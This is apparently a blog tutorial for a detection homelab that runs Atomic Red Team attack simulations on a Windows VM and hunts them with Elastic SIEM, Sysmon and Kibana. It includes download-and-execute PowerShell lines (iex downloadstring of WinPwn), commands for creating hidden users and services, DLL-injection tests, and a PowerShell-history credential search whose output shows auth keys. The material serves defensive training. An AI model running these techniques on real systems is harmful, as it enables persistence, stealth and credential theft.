Hey, cybersecurity enthusiasts! Welcome to a guide on setting up a zero-cost cybersecurity homelab to emulate attacker tactics, techniques, and procedures (TTPs) and hunt them down like a SOC analyst.

Main idea of this lab: We will be using Atomic Red Team by Red Canary to simulate attacks in a Windows VM, Elastic SIEM (14-day free trial) to monitor them, and Sysmon to catch small but important details. Plus, we’ll map these attacks to the Cyber Kill Chain to understand how adversaries move in our isolated environment. Let’s make this lab tight, practical, and ready to roll!.

Why map known TTPs to frameworks like the Cyber Kill Chain? If you’re in a SOC (or dreaming of one), the red team (Offfensive Secrity Team) might throw Atomic Red Team tests at the blue team to check if they can access the systems or not. You won’t always know exactly what they’re running, so mapping logs to frameworks like the Cyber Kill Chain helps you trace the attacker’s path, from recon to payload!

Setup:

Think of this lab as a mini SOC: your Windows VM generates attack logs via Atomic Red Team, Sysmon captures detailed system events, Elastic Agent ships those logs to Elastic SIEM, and Kibana visualizes it all for analysis. Here’s how the pieces fit:

1. Elastic: Assume this as a database that is used to search and analyse the data that you have collected.
2. Beats: The simplest way I can explain this is to picture this as a shipping container that collects goods and sends/transports them to their destination. This component is responsible for collecting data from the Windows VM in our setup.
3. Logstash: This component collects data from beats, ports, files, etc, normalizes it into field value pairs, and stores it into Elasticsearch.
4. Kibana: This is responsible for displaying and visualising the data stored in Elasticsearch into different visualizations, time charts, infographics, etc., using Kibana.

I guess that should be good enough to start the homelab now, as we just followed what Elastic SIEM is made up of, and what we are really going to do in this homelab.

Set Up Elastic SIEM

1. Head to https://cloud.elastic.co/login and sign up for a 14-day free trial. Choose Elastic Cloud Serverless as the deployment type — it’s lightweight and perfect for this lab.
2. In the setup wizard, select Security as your use case. If asked, “How will you use Elastic for Security?” pick Something else — this keeps the setup flexible for our TTP simulation.
3. Verify you’re in a serverless project: After logging in, check the top-left corner of the Elastic Cloud dashboard. It should say “Serverless” under your project name. If not, click Create Project, select Serverless, and name it (e.g., “TTP-Lab”).
4. Add SIEM data: Navigate to Integrations > Elastic Defend > Add Elastic Defend. Set the integration name (e.g., “Windows-TTP-Defend”) and choose Complete EDR for full endpoint monitoring.
5. Install Elastic Agent: In Elastic Defend’s settings, click Add Agent, select Windows x86–64, and copy the provided PowerShell command. Open an elevated PowerShell (Run as Administrator) on your Windows VM and paste the command to install the agent. This sets up log collection from your VM.
6. Click Assests -> Agents

7 . Click on Agent Policies -> click on the current policy that you have and then click on add integration.

8 . Search for Windows and add the integration but make sure that the option for Symon monitoring is turned on!

And you are done! Now you will be able to see Sysmon logs on your ELK SIEM.

Pro Tip: If the agent install fails, check your VM’s internet connection and ensure PowerShell is running as admin. You can verify the agent is running by checking Services (services.msc) for “Elastic Agent”.

Now let’s hop on to install Sysmon:

Sysmon is a System Monitoring tool that, unlike the classic Windows Event Logs, offers an analyst better visibility of processes launched, registry modifications, access to sensitive system files, network activity, etc., making it particularly useful for detecting suspicious activity.

• Download Sysmon from Microsoft Sysinternals. Scroll to the bottom and download the zip file.
• Extract the zip to a folder on your VM (e.g., C:\Tools\Sysmon).
• Download a Sysmon config file from SwiftOnSecurity’s GitHub. This config is tested on real world scenarios, capturing key events like process creation, network connections, and registry mods while filtering noise.
• In an elevated PowerShell, navigate to the Sysmon folder (e.g., cd C:\Tools\Sysmon) and run:

.\sysmon64.exe -accepteula -i ./path/to/your/config-file/sysmonconfig-export.xml

Why this particular config? SwiftOnSecurity’s XML is optimized for threat detection, capturing critical events like process injections and suspicious network activity without flooding your logs. If you want to tweak it, check the XML’s <EventFiltering> section to adjust what Sysmon logs (e.g., add <FileCreate> for file creation events).

Here is the screenshot of what the file looks like:

After this is done, go to your Elastic Security dashboard and head over to the Discover tab, and click on “*logs”. This is called an index, and you can assume it as a table that stores all different types of logs.

Install Atomic Red Team Safely

Atomic Red Team lets us simulate real-world attacks based on MITRE ATT&CK TTPs. Let’s install it securely and avoid rookie mistakes.

1. Open an elevated PowerShell and set the execution policy temporarily to allow running unsigned scripts for the install. We’ll revert it later for safety.

Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Bypass -Force

2. Install Atomic Red Team and its test definitions:

IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing);
Install-AtomicRedTeam -getAtomics

Security Note: Before running, verify the script’s integrity by checking its hash or reviewing the code at the GitHub URL. For example, download the script locally, compute its SHA256 hash (Get-FileHash install-atomicredteam.ps1), and compare it to a trusted source.

3. Import the module:

Import-Module "path/to/file/Invoke-AtomicRedteam.psd1" -Force

4. Set the Atomics folder path:

$PSDefaultParameterValues = @{"Invoke-AtomicTest:PathToAtomicsFolder"="C:\Tools\AtomicRedTeam\atomics"}

5. Test the setup:

help Invoke-AtomicTest

Revert Execution Policy: After installation, restore security:

Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -Force

This prevents unsigned scripts from running unchecked.

Attack Simulation:

With the lab ready, let’s run some Atomic Red Team tests and see what we catch. I’ll focus on a few tests (T1518, T1547, T1552, T1564, T1218) and fix the errors from the original guide by ensuring prerequisites and troubleshooting failures.

Execute Tests Interactively

You can execute tests in a way that lets you give input to the test during execution. For example, the commands executed may prompt you for confirmation before overwriting a file. To be able to do this, you must specify the -Interactive flag. If you don't specify the -Interactive flag and a command asks for user input, the execution will hang until it eventually times out. Reference: Execute Atomic Tests Interactively Github

Test 1: T1518 (Software Discovery)

What it does: Checks for installed software (e.g., Internet Explorer version, installed apps). Output Example:

PS C:\> Invoke-AtomicTest T1518 -Interactive
PathToAtomicsFolder = C:\AtomicRedTeam\atomics                                                                                                                                                                            Executing test: T1518-1 Find and Display Internet Explorer Browser Version                                                                                                                                                HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer                                                          svcVersion    REG_SZ    11.3636.19041.0                                                                                                                                                                               Exit code: 0                                                                                                 Done executing test: T1518-1 Find and Display Internet Explorer Browser Version
Executing test: T1518-2 Applications Installed
DisplayName                                      DisplayVersion Publisher                    InstallDate
-----------                                      -------------- ---------                    -----------
                                                                Microsoft Corporation
                                                                Microsoft Corporation
Oracle VirtualBox Guest Additions 7.1.6          7.1.6.167084   Oracle and/or its affiliates
                                                                Microsoft Corporation
Microsoft Update Health Tools                    3.74.0.0       Microsoft Corporation        20250815
Update for x64-based Windows Systems (KB5001716) 8.94.0.0       Microsoft Corporation        20250817
                                                                                                             DisplayName                     DisplayVersion Publisher             InstallDate                             -----------                     -------------- ---------             -----------                                                                                                                                          Microsoft Edge                  139.0.3405.102 Microsoft Corporation 20250817                                                                1.3.195.65                                                                   Microsoft Edge WebView2 Runtime 139.0.3405.102 Microsoft Corporation 20250816                                                                                                                                             Wazuh Agent                     4.12.0         Wazuh, Inc.           20250816
Exit code: 0
Done executing test: T1518-2 Applications Installed
Executing test: T1518-4 WinPwn - Dotnetsearch
iex : At line:1 char:1
+ #  Global TLS Setting for all functions. If TLS12 isn't suppported yo ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
At line:1 char:4
+ & {iex(new-object net.webclient).downloadstring('https://raw.githubus ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ParserError: (:) [Invoke-Expression], ParseException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressio
   nCommand                                                                                                                                                                                                               Dotnetsearch : The term 'Dotnetsearch' is not recognized as the name of a cmdlet, function, script file, or  operable program. Check the spelling of the name, or if a path was included, verify that the path is         correct and try again.                                                                                       At line:2 char:1                                                                                             + Dotnetsearch -noninteractive -consoleoutput}                                                               + ~~~~~~~~~~~~                                                                                                   + CategoryInfo          : ObjectNotFound: (Dotnetsearch:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
Exit code: 0
Done executing test: T1518-4 WinPwn - Dotnetsearch
Executing test: T1518-5 WinPwn - DotNet
iex : At line:1 char:1
+ #  Global TLS Setting for all functions. If TLS12 isn't suppported yo ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
At line:1 char:4
+ & {iex(new-object net.webclient).downloadstring('https://raw.githubus ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ParserError: (:) [Invoke-Expression], ParseException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressio
   nCommand                                                                                                                                                                                                               dotnet : The term 'dotnet' is not recognized as the name of a cmdlet, function, script file, or operable     program. Check the spelling of the name, or if a path was included, verify that the path is correct and try  again.                                                                                                       At line:2 char:1                                                                                             + dotnet -consoleoutput -noninteractive}                                                                     + ~~~~~~
    + CategoryInfo          : ObjectNotFound: (dotnet:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
Exit code: 0
Done executing test: T1518-5 WinPwn - DotNet
Executing test: T1518-6 WinPwn - powerSQL
iex : At line:1 char:1
+ #  Global TLS Setting for all functions. If TLS12 isn't suppported yo ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
At line:1 char:4
+ & {iex(new-object net.webclient).downloadstring('https://raw.githubus ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ParserError: (:) [Invoke-Expression], ParseException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressio
   nCommand
powerSQL : The term 'powerSQL' is not recognized as the name of a cmdlet, function, script file, or
operable program. Check the spelling of the name, or if a path was included, verify that the path is
correct and try again.
At line:2 char:1
+ powerSQL -noninteractive -consoleoutput}
+ ~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (powerSQL:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
Exit code: 0
Done executing test: T1518-6 WinPwn - powerSQLFixing Errors: Tests like T1518–4 (WinPwn — Dotnetsearch) failed because tools like Dotnetsearch or powerSQL weren’t installed. These require external dependencies (e.g., WinPwn scripts). If you want to run these, clone the WinPwn repo (git clone https://github.com/S3cur3Th1sSh1t/WinPwn) and ensure PowerShell modules are available. Otherwise, skip them for now — they’re not critical for this lab.

Fixing Errors: Tests like T1518–4 (WinPwn — Dotnetsearch) failed because tools like Dotnetsearch or powerSQL weren’t installed. These require external dependencies (e.g., WinPwn scripts). If you want to run these, clone the WinPwn repo (git clone https://github.com/S3cur3Th1sSh1t/WinPwn) and ensure PowerShell modules are available. Otherwise, skip them for now — they’re not critical for this lab.

Kibana Query:

1. In Elastic Security, go to Discover and select the logs-* index.
2. Set the time range to cover your test (e.g., “Last 1 hour”).
3. Search: event.module:sysmon AND registry.path:HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer
4. Look for svcVersion in the logs to confirm T1518–1’s registry query.

Test 2: T1547 (Boot or Logon Autostart Execution)

What it does: Simulates persistence via driver installation or RDP virtual channels.

Output Example:

PS C:\> Invoke-AtomicTest T1547 -Interactive                                                                 PathToAtomicsFolder = C:\AtomicRedTeam\atomics                                                                                                                                                                            Executing test: T1547-1 Add a driver
Microsoft PnP Utility
Adding driver package:  usbstor.inf
Driver package added successfully. (Already exists in the system)
Published Name:         usbstor.inf
Total driver packages:  1
Added driver packages:  1
Exit code: 0
Done executing test: T1547-1 Add a driver
Executing test: T1547-2 Driver Installation Using pnputil.exe
Microsoft PnP Utility
Processing inf :            acpipmi.inf
Successfully installed the driver.
Driver package added successfully.
Published name :            acpipmi.inf
Total attempted:              1
Number successfully imported: 1
Exit code: 0
Done executing test: T1547-2 Driver Installation Using pnputil.exe
Executing test: T1547-3 Leverage Virtual Channels to execute custom DLL during successful RDP session
The operation completed successfully.
Exit code: 0
Done executing test: T1547-3 Leverage Virtual Channels to execute custom DLL during successful RDP session
PS C:\>

Fixing Errors: Ensure pnputil.exe is available (C:\Windows\System32). If T1547–3 (RDP virtual channels) fails, verify Remote Desktop is enabled on your VM (System Properties > Remote > Allow remote connections).

Here is one resource which can be useful to check if we are dealing with windows binaries that can be used by malicious entities or not: https://lolbas-project.github.io/

If we search pnputil.exe on lolbas then we get the following:

Press enter or click to view image in full size

We got to know one more thing that it is used for boot or logon autostart execution if used in a bad way.

Kibana Query:

• Search: event.module:sysmon AND file.name:usbstor.inf OR file.name:acpipmi.inf
• Look for FileCreate or ProcessCreate events showing driver activity.

Test 3: T1552 (Unsecured Credentials)

What it does: Searches PowerShell history for sensitive data.

Output Example:

PS C:\> Invoke-AtomicTest T1552 -Interactive
PathToAtomicsFolder = C:\AtomicRedTeam\atomics
Executing test: T1552-2 Search for Passwords in Powershell History
C:\Users\spars\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt:25:Set-Execut
ionPolicy -Scope Process -ExecutionPolicy Bypass
C:\Users\spars\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt:80:Remove-Ite
m -Path "C:\Program Files\ossec-agent" -Recurse -Force
C:\Users\spars\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt:85:Test-NetCo
nnection -ComputerName 192.168.2.63 -Port 1514`
C:\Users\spars\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt:90:.\agent-au
th.exe -m 192.168.2.63 -p 1515 -A "victim-windows" -P
17ad8e73746c649589e834c128c2b0b537224f8e9d22b3dd200ff34590c7f3df
C:\Users\spars\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt:91:.\agent-au
th.exe -m 192.168.2.63 -p 1515 -A "DESKTOP-NSRR900" -P
9f81fe6d132dd0d49da79f1853a1f4c09b06afea90ac00bb3aef412223d7fa56
Exit code: 0
Done executing test: T1552-2 Search for Passwords in Powershell HistoryFixing Errors: No issues here, but ensure the PowerShell history file exists (C:\Users\<YourUser>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine).

Kibana Query:

• Search: event.module:sysmon AND file.path:*ConsoleHost_history.txt
• Check for FileCreate or FileAccess events.

Test 4: T1564 (Hide Artifacts)

What it does: Creates hidden users or services for stealth.

Output Example:

PS C:\> Invoke-AtomicTest T1564 -Interactive                                                                 PathToAtomicsFolder = C:\AtomicRedTeam\atomics                                                                                                                                                                            Executing test: T1564-1 Extract binary files via VBA                                                                                                                                                                      At line:4 char:6                                                                                             + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-te ...                                  +      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                                          + CategoryInfo          : InvalidOperation: (System.Net.HttpWebRequest:HttpWebRequest) [Invoke-WebReque     st], WebException                                                                                             + FullyQualifiedErrorId : WebCmdletWebResponseException,Microsoft.PowerShell.Commands.InvokeWebRequestC     ommand                                                                                                                                                                                                                 Invoke-Maldoc : The term 'Invoke-Maldoc' is not recognized as the name of a cmdlet, function, script file,   or operable program. Check the spelling of the name, or if a path was included, verify that the path is      correct and try again.                                                                                       At line:5 char:1                                                                                             + Invoke-Maldoc -macroCode "$macro" -officeProduct "Word" -sub "Extract ...                                  + ~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (Invoke-Maldoc:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
Exit code: 0
Done executing test: T1564-1 Extract binary files via VBA
Executing test: T1564-2 Create a Hidden User Called "$"
The command completed successfully.
Exit code: 0
Done executing test: T1564-2 Create a Hidden User Called "$"
Executing test: T1564-3 Create an "Administrator " user (with a space on the end)
Name           Enabled Description
----           ------- -----------
Administrator  True
Exit code: 0
Done executing test: T1564-3 Create an "Administrator " user (with a space on the end)
Executing test: T1564-4 Create and Hide a Service with sc.exe
[SC] CreateService SUCCESS
[SC] SetServiceObjectSecurity SUCCESS
Exit code: 0
Done executing test: T1564-4 Create and Hide a Service with sc.exe
Executing test: T1564-5 Command Execution with NirCmd
The system cannot find the path specified.
Exit code: 0
Done executing test: T1564-5 Command Execution with NirCmd

Fixing Errors: T1564–1 (VBA macro) failed due to missing Invoke-Maldoc. Skip this unless you’ve installed the Atomic Red Team VBA dependencies. For T1564–5 (NirCmd), install NirCmd (choco install nircmd if Chocolatey is on your VM).

Kibana Query:

• Search: event.module:sysmon AND process.name:net.exe AND process.args:user
• Look for ProcessCreate events creating users like “$” or “Administrator ”.

Test 5: T1218 (Signed Binary Proxy Execution)

What it does: Abuses trusted Windows binaries (e.g., mavinject.exe) to run malicious code.

Output Example:

PS C:\> Invoke-AtomicTest T1218 -Interactive PathToAtomicsFolder = C:\AtomicRedTeam\atomics Executing test: T1218–1 mavinject - Inject DLL into running process operable program or batch file. Exit code: 1 Done executing test: T1218–1 mavinject - Inject DLL into running process Executing test: T1218–2 Register-CimProvider - Execute evil dll 'Namespace' is not specified. 'ProviderName' is not specified. Failed to load provider 'C:\AtomicRedTeam\atomics\T1218\src\Win32\T1218–2.dll'. Failure code 0x8007045A. 
Try 'Register-CimProvider.exe -help' for help.
Exit code: -2147217400
Done executing test: T1218–2 Register-CimProvider - Execute evil dll
Executing test: T1218–3 InfDefaultInstall.exe .inf Execution Exit code: 0 Done executing test: T1218–3 InfDefaultInstall.exe .inf Execution Executing test: T1218–4 ProtocolHandler.exe Downloaded a Suspicious File ERROR: The system was unable to find the specified registry key or value. Exit code: 1 Done executing test: T1218–4 ProtocolHandler.exe Downloaded a Suspicious File Executing test: T1218–5 Microsoft.Workflow.Compiler.exe Payload Execution Exit code: 0
Done executing test: T1218–5 Microsoft.Workflow.Compiler.exe Payload Execution
Executing test: T1218–6 Renamed Microsoft.Workflow.Compiler.exe Payload Executions
& : The term 'C:\AtomicRedTeam\atomics\..\ExternalPayloads\svchost.exe' is not recognized as the name of a
cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was
included, verify that the path is correct and try again. At line:1 char:5 + & {&"C:\AtomicRedTeam\atomics\..\ExternalPayloads\svchost.exe" "C:\At … + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : ObjectNotFound: (C:\AtomicRedTea…ads\svchost.exe:String) [], CommandNotFoun dException + FullyQualifiedErrorId : CommandNotFoundException Exit code: 0 Done executing test: T1218–6 Renamed Microsoft.Workflow.Compiler.exe Payload Executions Executing test: T1218–7 Invoke-ATHRemoteFXvGPUDisablementCommand base test Invoke-ATHRemoteFXvGPUDisablementCommand : The term 'Invoke-ATHRemoteFXvGPUDisablementCommand' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. At line:1 char:4 + & {Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName foo -ModulePa … + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : ObjectNotFound: (Invoke-ATHRemoteFXvGPUDisablementCommand:String) [], Command NotFoundException + FullyQualifiedErrorId : CommandNotFoundException Exit code: 0 Done executing test: T1218–7 Invoke-ATHRemoteFXvGPUDisablementCommand base test Executing test: T1218–8 DiskShadow Command Execution C:\Windows\System32\diskshadow.exe : The term 'C:\Windows\System32\diskshadow.exe' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:4
+ & {C:\Windows\System32\diskshadow.exe -S C:\AtomicRedTeam\atomics\T12 …
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 + CategoryInfo : ObjectNotFound: (C:\Windows\System32\diskshadow.exe:String) [], CommandNotFou
 ndException
 + FullyQualifiedErrorId : CommandNotFoundException
Exit code: 0
Done executing test: T1218–8 DiskShadow Command Execution
Executing test: T1218–9 Load Arbitrary DLL via Wuauclt (Windows Update Client)
Exit code: -2147024770
Done executing test: T1218–9 Load Arbitrary DLL via Wuauclt (Windows Update Client)
Executing test: T1218–10 Lolbin Gpscript logon option
'Gpscript' is not recognized as an internal or external command,
operable program or batch file.
Exit code: 1
Done executing test: T1218–10 Lolbin Gpscript logon option
Executing test: T1218–11 Lolbin Gpscript startup option
'Gpscript' is not recognized as an internal or external command,
operable program or batch file.
Exit code: 1
Done executing test: T1218–11 Lolbin Gpscript startup option
Executing test: T1218–12 Lolbas ie4uinit.exe use as proxy 1 file(s) copied. 1 file(s) copied. Exit code: 0 Done executing test: T1218–12 Lolbas ie4uinit.exe use as proxy Executing test: T1218–13 LOLBAS CustomShellHost to Spawn Process Directory: C:\ Mode LastWriteTime Length Name - - - - - - - - - - - - - - d - - - 19–08–2025 06:43 test
Copy-Item : Cannot find path 'C:\windows\system32\customshellhost.exe' because it does not exist.
At line:5 char:1
+ Copy-Item -Path "C:\windows\system32\customshellhost.exe" -Destinatio …
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 + CategoryInfo : ObjectNotFound: (C:\windows\system32\customshellhost.exe:String) [Copy-Item],
 ItemNotFoundException
 + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.CopyItemCommand
C:\test\customshellhost.exe : The term 'C:\test\customshellhost.exe' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. At line:7 char:1 + C:\test\customshellhost.exe} + ~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : ObjectNotFound: (C:\test\customshellhost.exe:String) [], CommandNotFoundExcep tion + FullyQualifiedErrorId : CommandNotFoundException
Exit code: 0
Done executing test: T1218–13 LOLBAS CustomShellHost to Spawn Process
Executing test: T1218–14 Provlaunch.exe Executes Arbitrary Command via Registry Key
The operation completed successfully.
The operation completed successfully.
Exit code: 0
Done executing test: T1218–14 Provlaunch.exe Executes Arbitrary Command via Registry Key
Executing test: T1218–15 LOLBAS Msedge to Spawn Process
SUCCESS: The process "msedge.exe" with PID 16064 has been terminated.
SUCCESS: The process "msedge.exe" with PID 16132 has been terminated.
SUCCESS: The process "msedge.exe" with PID 16340 has been terminated.
SUCCESS: The process "msedge.exe" with PID 16348 has been terminated.
SUCCESS: The process "msedge.exe" with PID 13464 has been terminated.
SUCCESS: The process "msedge.exe" with PID 13524 has been terminated.
SUCCESS: The process "msedge.exe" with PID 6296 has been terminated.
SUCCESS: The process "msedge.exe" with PID 6964 has been terminated.
SUCCESS: The process "msedge.exe" with PID 6972 has been terminated.
SUCCESS: The process "msedge.exe" with PID 8372 has been terminated.
SUCCESS: The process "msedge.exe" with PID 10444 has been terminated.
SUCCESS: The process "msedge.exe" with PID 3684 has been terminated.
ERROR: The process "calc.exe" not found.
ERROR: The process "win32calc.exe" not found.
Exit code: 0
Done executing test: T1218–15 LOLBAS Msedge to Spawn Process
Executing test: T1218–16 System Binary Proxy Execution - Wlrmdr Lolbin
Exit code: 0
Done executing test: T1218–16 System Binary Proxy Execution - Wlrmdr Lolbin
PS C:\>

Fixing Errors: T1218–1 fails if no target process is running. Run a dummy process (e.g., notepad.exe) before the test. For T1218–8 (diskshadow.exe), ensure it’s in C:\Windows\System32. For T1218–13 (customshellhost.exe), copy a legitimate binary (e.g., notepad.exe) to C:\test\customshellhost.exe to simulate the test.

Kibana Query:

• Search: event.module:sysmon AND process.name:mavinject.exe OR process.name:diskshadow.exe
• Look for ProcessCreate or ModuleLoad events.

Mapping to the Cyber Kill Chain: Let’s Get Precise

Now let’s map the output to Cyber Kill Chain and see what is the test really trying to do, i.e., under which part of the kill chain does this test lies(Here is the link which you can refer if you want to map these out with the framework: https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html):

T1518 (Software Discovery)

• Exploitation: In this case if we see the output of the test that we ran, we can see that the script tries to download a powershell script from Github, but fails to do so as it has been been blocked by the antivirus software. Lets find the link used by the script by searching “raw.git*” on ELK:

If we go to the link then we can observe that the script fetches remote modules, run PowerShell commands, or connect to external repos.

T1547 (Boot or Logon Autostart Execution)

• Exploitation: Abuses driver installation (pnputil.exe) to gain kernel-level access.
• Installation: Adds drivers (usbstor.inf, acpipmi.inf) or RDP channels for persistence. Check file.name:*.inf in Kibana.

T1552 (Unsecured Credentials)

• Exploitation: Reads PowerShell history for credentials.
• Actions on Objectives: Harvested credentials enable lateral movement or privilege escalation. Search file.path:*ConsoleHost_history.txt in Kibana.

T1564 (Hide Artifacts)

• Exploitation: Uses OS features (e.g., net.exe for hidden users) for stealth.
• Installation: Creates hidden users/services for persistence. Look for process.name:net.exe in Kibana.
• Actions on Objectives: Hides attacker presence to prolong access.

T1218 (Signed Binary Proxy Execution)

• Exploitation: Abuses trusted binaries (e.g., mavinject.exe) to run code.
• Installation: Some sub-tests enable persistence via DLLs.
• Command and Control: Proxies payloads through trusted tools, evading detection.
• Actions on Objectives: Executes attacker goals stealthily. Search process.name:mavinject.exe in Kibana.

Kibana Success Check: For each test, go to Discover, set the time range (e.g., “Last 1 hour”), and use the queries above. You should see Sysmon events like ProcessCreate, FileCreate, or RegistryValueSet matching the test’s behavior. If not, check Elastic Agent status (Get-Service ElasticAgent) or Sysmon logs.

Conclusion

Here we go! A zero-cost Adversary TTP Simulation Lab! We’ve learned to set up Elastic SIEM, Sysmon, and Atomic Red Team, run attack simulations, hunt logs in Kibana, and map them to the Cyber Kill Chain. This lab gives you hands-on skills to emulate and detect attacker TTPs in a safe environment, prepping you for real-world SOC challenges.

Got questions? Drop a comment, and I’ll help you troubleshoot. Keep learning, building and hacking(In an ethical way of course!), and stay curious!